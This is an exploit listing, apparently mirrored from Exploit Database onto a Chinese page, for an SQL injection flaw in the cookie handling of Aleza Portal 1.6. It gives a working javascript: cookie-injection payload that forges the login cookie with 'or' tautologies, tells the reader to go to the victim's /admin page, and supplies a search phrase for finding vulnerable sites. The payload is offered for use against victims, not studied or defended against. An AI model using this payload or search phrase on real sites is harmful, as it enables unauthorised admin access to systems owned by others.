Aleza Portal 1.6 – Insecure SQL Injection / Cookie Handling

• Exploit Database
• 33 阅读

• 作者： KnocKout
  日期： 2010-09-28
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15144/

• Aleza Portal v1.6 - Insecure (SQLi) Cookie Handling 
  =========================================================
  ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  [+] Author : KnocKout 
  [~] Contact : knockoutr@msn.com
  ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  ~Web App. : Aleza Portal v1.6
  ~Software: http://www.webavail.com/
  -Demo : http://www.webavail.com/alezademo/
  ~Vulnerability Style : (SQLi) Cookie Handling
  ~Google Keywords : Copyright 2001 WebAvail Productions, Inc. All Rights Reserved.
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  
  ~~~~~~~~ Explotation ~~~~~~~~~~~
  
  Browser Injection for handling() by Javascript-SQLi Codes
  ================================
  javascript:document.cookie="alezalogin=login='or'level=11&pass='or';path=/";
  ================================
  [+]Exploitable Browser Injected!
  
  [+] Go to : http://[Victim]/admin
  
  
  GoodLucK ;)